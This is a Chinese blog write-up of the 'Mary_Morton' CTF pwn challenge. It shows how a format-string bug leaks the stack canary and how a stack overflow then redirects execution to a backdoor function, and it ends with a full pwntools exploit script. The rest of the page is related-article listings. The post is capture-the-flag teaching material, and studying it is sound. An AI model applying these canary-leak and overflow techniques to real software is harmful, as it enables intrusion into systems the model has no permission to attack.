攻防世界 Mary_Morton Writeup

最新推荐文章于 2024-08-21 16:56:45 发布
最新推荐文章于 2024-08-21 16:56:45 发布
阅读量176 收藏
点赞数
分类专栏: pwn题解 文章标签: pwn python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yajuanpi4899/article/details/121736308
版权

checksec一下:

 包含Canary,使用ida 64逆向:

进入sub_4009DA查看:

根据提示,本题中应该包含两个漏洞点,1.栈溢出 2.格式化字符串漏洞 ,由于包含Canary,先进入2函数:

 先read进buf字符串,再printf,此处包含一个格式化字符串漏洞

进入1进行函数查看:

最后还有一个后门函数:

 

推测:首先利用格式化字符串进行Canary暴露,然后进行栈溢出漏洞,进而执行后门函数

先对格式化字符串进行字符串偏移量的查找:

如图所示,出来的61616161在第六个位置,即6个偏移量

 

再看buf中var_8,即canary的位置,本身它离栈顶位置就有:0x90-8=0x88

而64位程序一个字节位8bit,偏移量为:0x88/8=17

再加上6个偏移量,即23个偏移量位置就是canary

可以构造第一次输入:%23$p进行canary值的获取

当获取canary时,第二次用栈溢出方式进行溢出至后台函数:

from pwn import *
io = process("./Mary_Morton")

io.recvuntil("3. Exit the battle ")
io.sendline("2")
io.sendline("%23$p")
io.recvuntil("0x")
canary=int(io.recv(16),16)

sys_addr = 0x4008DA

payload = b'A'*0x88 + p64(canary) + b'B'*0x8 + p64(sys_addr)
io.recvuntil("3. Exit the battle ")
io.sendline("1")
io.sendline(payload)

io.interactive()

 

胡胡同志要加油
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
bailey_morton_cv:贝利·莫顿(Bailey Morton)的简历
04-01
bailey_morton_cv 贝利·莫顿(Bailey Morton)的简历
morton BLDC__and_PCB_Included.rar
08-01
标题"Morton BLDC__and_PCB_Included.rar"暗示了这个压缩包可能包含了关于Morton品牌无刷直流电动机(BLDC)以及与其相关的电路板(PCB)的设计、规格或使用信息。BLDC电机是一种现代电机技术,常用于需要高效率、...
XCTF-攻防世界CTF平台-PWN类——1、Mary_Morton(格式化字符串漏洞、缓冲区溢出漏洞)
Onlyone_1314的博客
09-09 1350
目录标题一级目录二级目录1、查看程序基本信息2、反编译程序3、攻击思路(1)先利用功能2格式化字符串漏洞(2)找到功能1的sub_400960()函数返回地址的位置方法二 一级目录 二级目录 1、查看程序基本信息 Mary_Morton程序,先用file查看: Linux下64位的ELF文件 再用checksec查看 程序开启了Partial RELRO、NX和Canary,没有PIE。程序开启了canary,就不能直接利用栈溢出覆盖返回地址了。因为在初始化一个栈帧时在栈底(stack overflow
攻防世界 Mary_Morton
qq_25044201的博客
01-08 154
刚开始我们都要ida静态分析一下 当为1的时候,发生格式化字符串泄露canary 当为2时候,栈溢出到后门函数 获得flag 先通过格式化字符串泄露计算偏移量 发现为第6个参数,然而 buf到canary为0x88个字节,0x88/8=17个 17+6=23个 说明输入的a到canary为23个参数 即canary为%23$p 因为有个alarm函数 所以我们写道py里 ...
攻防世界pwn--Mary_Morton
YANG12345_6的博客
11-16 2223
攻防世界pwnMary_Morton file 一下,查看文件属性 checksec一下,查看保护措施 开了canary,在调用函数的时候会在栈上设置一个标志,标志的位置: EIP EBP canary logol ··· 栈的其他内容 开了NX,栈不可执行。 运行一下 ida查看其反汇编代码 在ida里看到有system函数: 地址:0x4008DA gdb调试,查看格式化字符串参数的位置 第六个位置 查看有关栈溢出的函数: 可以利用的栈溢出的buf的位置:rbp
攻防世界高手进阶区 ——Mary_Morton
weixin_62675330的博客
02-26 3934
攻防世界高手进阶区 ——Mary_Morton 不容易呀,这都已经是第七题了,继续加油! 一,老规矩,先分析一下文件 checksec一下 发现开启了栈溢出,可能这个题就是学习栈溢出漏洞绕过的。 运行一下 告诉了存在栈溢出漏洞和格式化字符串漏洞。 file文件 ┌──(root💀kali)-[/home/…/面/ctf_workstation/Offensive_and_defensive_world/Mary_Morton] └─# file Mary_Morton
攻防世界Mary_Morton
像初雪一样自由洒落
02-16 927
64位程序,开启了canary和nx保护 执行以下,效果如下: 有提示: 输入1那块存在栈溢出 输入2那块存在格式化字符串漏洞 拖到ida看一下 main函数: 栈溢出的函数: 有canary保护,根据程序可以看出,v2应该就是canary的值,一开始,将_readfsqword(0x28u)的值给v2,后来又和v2做异或操作,只有v2与它还相等,...
攻防世界-Mary_Morton
Henlenl的博客
11-30 3016
检查文件信息 amd64-elf文件 开启了Canary保护 开启了NX保护 ida静态分析 进入到sub_4008EB函数 格式化字符串漏洞 另外进入到sub_400960()函数有栈溢出漏洞 但是有一点开启了Canary 那么我们可以通过 格式化字符串任意读 泄露Canary地址 然后利用这个地址来进行溢出漏洞的利用 栈分布如图 而我们知道 v2就是用来储存canary的值的变量 而buf 大小位0x90 v2的大小位 0x8 覆盖return addr,需要0x90-0x8=0x88大小去
攻防世界pwn——Mary_Morton
qq_62076255的博客
12-19 182
做题记录
攻防世界Mary_Morton wp
苗_的博客
10-13 291
首先查看他的保护机制:(checksec) 有canary保护 然后我们拖进ida发现两处溢出点: 看一下流程图和汇编可以知道readsqword这个地方有canary保护,只有 rax 和fs:28h 两个值相等的时候 才能跳转到返回值,反之则调用stack_chk_fail 找到后门函数 思路:将两个漏洞结合利用,首先利用字符串漏洞,泄露出canary的值,然后在函数要返回的时候再填回去,之后利用栈溢出,让其返回到后门函数 根据程序可以看出,v2应该就是canary的..
[攻防世界 pwn]——Mary_Morton
Y_peak的博客
02-20 194
[攻防世界 pwn]——Mary_Morton 题目地址: https://adworld.xctf.org.cn/ 题目: checksec看下,64位还开启了NX和canary保护。(一般开启canary保护,都有格式化字符串漏洞) 在IDA中看看, 果然有格式化字符串漏洞 仔细看看代码会发现, 这个是个死循环, 1 里面有栈溢出, 2里面有格式化字符串漏洞, 3是退出。 我们可以先利用格式化字符串的漏洞, 泄露出canary, 然后就可以利用栈溢出修改返回地址了。 最近我学了一个新的
lguest_launcher.rar_The Program
09-23
LGuest 是一种开源的用户空间虚拟化工具,由 Google 的 Andrew Morton 主导开发。它的设计目标是提供一种简单、快速的方法来创建和运行小型虚拟机,这些虚拟机可以在宿主机操作系统(如 Linux)上运行而不需依赖复杂...
libmorton:C ++仅限标头的库,其方法可以从2D3D坐标有效地编码Morton代码
05-05
Libmorton是仅C ++头文件的库,提供了以2D和3D有效编码/解码64位,32位和16位Morton代码和坐标的方法。 莫顿阶也称为Z阶或。 Libmorton是一个轻量级且可移植的库-唯一的依赖项是标准C ++头文件。 提供特定于体系...
morton-java:莫顿PackUnpack库
05-12
Morton64 m = new Morton64 ( 2 , 32 ); // 2 dimenstions 32 bits eachlong code = m . pack( 13 , 42 ); // pack two valueslong [] values = m . unpack(code); // should get back 13 and 42
yolov8 出现loss 为nan
最新发布
zhaoluruoyan89的博客
08-21 99
这篇博客警示读者在购买用于深度学习的显卡时要避开那些导致RuntimeWarning: All-NaN slice encountered的问题。作者强调这些Tensor核心存在严重缺陷,不适宜进行深度学习任务,建议大家在选购时务必谨慎。方法二:将混合精度训练AMP 设置为False。方法一:降低cuda和pytorch 版本号。
基于Python星载气溶胶数据处理与反演分析
lwjnlqiqi的博客
08-21 620
Python星载气溶胶数据处理与反演分析
python之matplotlib (5 散点图和柱状图)
这是C.L 的博客,欢迎大家学习浏览!!
08-20 344
附:colormap对照 '%.f'%y‘是标注数据的形式设置:保留两位小数,数据来源于y数组。也可以这样写:f'{y:.2f}',在它前面的参数是标注的位置。也可以是一个数组,表示每个点的颜色不同。ax.bar()中y参数是直方图的高度,其中facecolor是条形图的颜色,而edgecolor是除了条形图内的颜色。也可以是一个数组,表示每个点的大小不同。参数来指定一个colormap,用于映射颜色数组到颜色。
Transformer经典模型实战:零基础训练一个面向中文的T5模型(Text to Text Transfer Transformer)
bayesian1的博客
08-20 876
Transformer经典模型实战:零基础训练一个面向中文的T5模型(Text to Text Transfer Transformer),通过构建T5模型,采用中文重写任务的数据集进行训练,模型效果非常好,貌似还涌现出了一定的创造力。
求矩阵四叉树的四进制和十进制Morton
06-09
- 将Morton码的二进制表示转化为四进制数,得到节点的四进制Morton码,例如节点(3,2)的四进制Morton码为(32)。 2. 十进制Morton码 十进制Morton码将矩阵四叉树节点的坐标编码成十进制数,其中每一位表示节点在四叉...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值